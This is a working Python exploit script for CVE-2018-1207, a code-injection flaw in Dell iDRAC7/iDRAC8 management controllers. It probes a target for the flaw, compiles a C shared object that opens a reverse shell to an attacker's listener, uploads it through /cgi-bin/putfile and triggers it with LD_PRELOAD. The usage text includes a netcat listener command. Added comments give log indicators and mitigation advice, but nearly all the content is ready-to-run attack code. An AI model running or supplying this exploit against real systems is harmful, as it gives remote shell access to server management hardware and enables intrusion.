# Dell iDRAC7 and iDRAC8 Devices Code Injection Vulnerability (RCE)
# Vulnerable firmware versions: < 2.52.52.52
# CVE number: CVE-2018-1207
import requests
import sys
import os
import re
import struct
import urllib3

# Proof-of-concept script for CVE-2018-1207 (Dell iDRAC7/iDRAC8; fixed in the
# firmware version named in the header above).  Sequence of steps:
#   1. probe /cgi-bin/login with an LD_DEBUG query parameter and look for loader
#      output reflected in the response,
#   2. write and cross-compile a small shared object (payload.c -> payload.so),
#   3. upload it through /cgi-bin/putfile with a fixed header record,
#   4. request /cgi-bin/discover with LD_PRELOAD pointing at the uploaded file,
#   5. delete the local payload files.
#
# Defender notes: the only network traffic this script generates is HTTPS
# GET/POST requests to /cgi-bin/login, /cgi-bin/putfile and /cgi-bin/discover
# carrying `LD_DEBUG=` or `LD_PRELOAD=` in the query string; those strings in
# iDRAC web or reverse-proxy logs are the thing to alert on.  Mitigation is the
# firmware update from the header, and keeping the management interface off
# networks that untrusted hosts can reach limits exposure.

# TLS certificate verification is disabled on every request below
# (verify=False), so the warning urllib3 would print for that is silenced here.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("""
___ _ _ ____ ____ __ __ ____ __ ____ __ ____
/ __)/ )( \( __)___(___ \ / \ / \/ _ \ ___ / \(___ \ / \(__ )
( (__ \ \/ / ) _)(___)/ __/( 0 )(_/ /) _ ((___)(_/ / / __/( 0 ) / /
\___) \__/ (____) (____) \__/ (__)\____/ (__)(____) \__/ (_/
""")
# Positional arguments: target host and port, then the address and port of the
# listener the compiled payload connects back to.  A missing argument raises
# IndexError, which is what the handler below is meant to catch.
try:
    host = sys.argv[1:][0]
    port = sys.argv[1:][1]
    lhost = sys.argv[1:][2]
    lport = sys.argv[1:][3]
except:
    # NOTE(review): a bare `except:` also swallows KeyboardInterrupt and
    # SystemExit; `except IndexError:` is the case actually intended here.
    print("Usage: python ./CVE-2018-1207.py <remote_host> <remote_port> <local_host> <local_port> ")
    print(" python ./CVE-2018-1207.py 192.168.1.10 443 192.168.1.200 5500")
    print(" nc -v -l -p <local_port> ")
    exit()
# Local working files: the C source written below and the shared object the
# cross-compiler produces from it.  Both are removed again at the end.
payloadbin = 'payload.so'
payloadc = 'payload.c'
# Per-request timeout in seconds for every requests.* call.
timeout = 10
url = 'https://' + str(host) + ':' + str(port)
# Step 1: probe.  With LD_DEBUG=files the dynamic loader logs the objects it
# loads and initialises; the regex below looks for one of those lines being
# echoed back in the HTTP body, which shows the CGI passes query parameters
# through as environment variables.
try:
    r = requests.get(url + '/cgi-bin/login?LD_DEBUG=files', verify=False, timeout=timeout)
except:
    # NOTE(review): bare except again; `except requests.RequestException:`
    # covers the connection/timeout errors this is guarding against.
    print("An error connecting to the server " + str(url))
    exit()
vul = re.search(r'calling init: /lib/', r.text)
if vul:
    print('[+] Server ' + str(url) + ' is vulnerable')
else:
    print('[-] Server ' + str(url) + ' is not vulnerable')
    exit()
# Step 2: build the shared object.  The C source has a constructor function
# that runs when the library is loaded; it forks and the child opens a TCP
# connection to lhost:lport (filled in via the %d / %s placeholders), attaches
# stdin/stdout/stderr to that socket and execs /bin/sh.
print("Generate Payload")
if os.path.exists(payloadc):
    os.unlink(payloadc)
payload = ("""
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
static void main(void) __attribute__((constructor));
static void main(void)
{
int pid = fork();
if(!pid) {
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr = {0};
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(%d);
serv_addr.sin_addr.s_addr = inet_addr("%s");
connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "/bin/sh", NULL);
}
}
""") % (int(lport), lhost)
with open(payloadc, 'w') as file:
    file.write(payload)
if os.path.exists(payloadc):
    # Fixed command string, no user-supplied text reaches the shell.  The
    # toolchain name suggests the iDRAC runs an SH4 CPU (inferred from the
    # compiler prefix, not stated on this page).  os.system returns the raw
    # wait status, hence WEXITSTATUS to get the compiler's exit code.
    cmd = os.system('sh4-linux-gnu-gcc-11 -shared -fPIC ./payload.c -o ./payload.so')
    exit_code = os.WEXITSTATUS(cmd)
    if exit_code == 0:
        print("[+] Generated payload.")
    else:
        print("[!] Error generate payload. Need the package gcc-11-sh4-linux-gnu (apt-get install gcc-11-sh4-linux-gnu).")
        exit()
else:
    print("[!] Error generate payload. Please check the permissions and owner of that directory.")
    exit()
# Flags word placed in the putfile header record; its meaning is not
# documented here.
FFLAGS = 1
# NOTE(review): a `with open(...)` block would close the file even on error.
f = open(payloadbin, 'rb')
payload_so = f.read()
f.close()
# Step 3: upload.  The POST body is a fixed-layout record: a 32-byte alias
# padded with NUL bytes, a little-endian uint32 payload length, a little-endian
# uint32 flags word, then the shared object itself.
f_alias = 'RACPKSSHAUTHKEY1'
res = bytes((f_alias + (32 - len(f_alias)) * '\0'),'utf-8')
res += struct.pack('<L', len(payload_so))
res += struct.pack('<L', FFLAGS)
res += payload_so
print("Upload payload")
r = requests.post(url + '/cgi-bin/putfile', data=res, verify=False, timeout=timeout)
# Only the HTTP status is checked; the response body is not inspected.
if r.status_code == 200:
    print("[+] OK")
else:
    print("Failed upload Payload")
    exit()
# Step 4: trigger.  /tmp/sshpkauthupload.tmp is presumably where the putfile
# endpoint stores an upload with the alias used above (inferred from the alias
# and file names; not confirmed on this page).  The response of this request
# is not examined, so "Good luck!" is printed regardless of outcome.
print("Start shell.")
r = requests.get(url + '/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', verify=False, timeout=timeout)
print("Good luck!")
# Step 5: remove the local source and compiled object.  Note that the early
# exit() calls above skip this cleanup.
if os.path.exists(payloadc):
    os.unlink(payloadc)
if os.path.exists(payloadbin):
    os.unlink(payloadbin)